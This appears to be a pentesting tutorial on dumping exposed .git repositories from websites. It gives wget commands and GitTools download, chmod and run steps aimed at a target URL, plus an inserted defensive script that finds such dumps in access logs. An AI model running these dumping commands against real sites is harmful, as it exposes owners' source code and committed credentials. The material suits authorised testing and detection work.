Dump Git Repository from Website
If we can access the git repository on the target website, we can dump it and investigate the git logs or history for sensitive information.
Dumping
We can simply use the wget command in Linux to download the git repository.
After that, we can investigate files or all histories.
# -r: Recursive
wget -r https://example.com/.git/
cd example.com
git log --stat
git checkout <commit_id>
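From the server side, a recursive download like the one above shows up in the access log as a run of requests under /.git/. The following is an added example, not part of the original page: it scans Combined Log Format lines and separates clients that were actually served repository files from those that only probed. The log format, the sample lines and the function names are assumptions made for this sketch.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# /.git/ anywhere in the path, or a bare /.git; does not match /.gitignore
GIT_RE = re.compile(r'(?:^|/)\.git(?:/|$)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Wget/1.21"',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "Wget/1.21"',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /.git/index HTTP/1.1" 200 4096 "-" "Wget/1.21"',
    '198.51.100.9 - - [10/Jan/2024:11:30:00 +0000] "GET /.git/HEAD HTTP/1.1" 403 153 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Jan/2024:11:30:01 +0000] "GET /%2egit/config?x=1 HTTP/1.1" 404 153 "-" "curl/8.0"',
    '192.0.2.44 - - [10/Jan/2024:12:00:00 +0000] "GET /docs/my.github.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Jan/2024:12:00:05 +0000] "GET /.gitignore HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

def summarize(lines):
    """Return {client_ip: {"served": [paths], "not_served": [paths]}} for .git requests."""
    report = defaultdict(lambda: {"served": [], "not_served": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, _method, raw_path, status = m.groups()
        # Drop the query string and decode %2e so /%2egit/ is caught as well.
        path = unquote(raw_path.split("?", 1)[0])
        if not GIT_RE.search(path):
            continue
        bucket = "served" if status.startswith("2") else "not_served"
        report[ip][bucket].append(path)
    return dict(report)

def exposed_to(report):
    """Clients that received at least one repository file (2xx response)."""
    return sorted(ip for ip, hits in report.items() if hits["served"])

if __name__ == "__main__":
    rep = summarize(SAMPLE)
    for ip in exposed_to(rep):
        print(ip, "was served", len(rep[ip]["served"]), "files under .git")
```

Any address returned by exposed_to means repository content left the server, so credentials and keys that ever appeared in the commit history should be treated as disclosed.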
Dumping with gitdumper and extractor
GitTools downloads the Git repository of a web application.
To dump the repository, execute the following commands.
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example
We should now have the git repository locally.
Then extract the entire project by executing the following.
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example
Now we have retrieved the entire git project from the website.
It is stored in the “./new_example” folder, where we can investigate the repository.
Dumping with Git-Dumper
git-dumper is a useful Python package.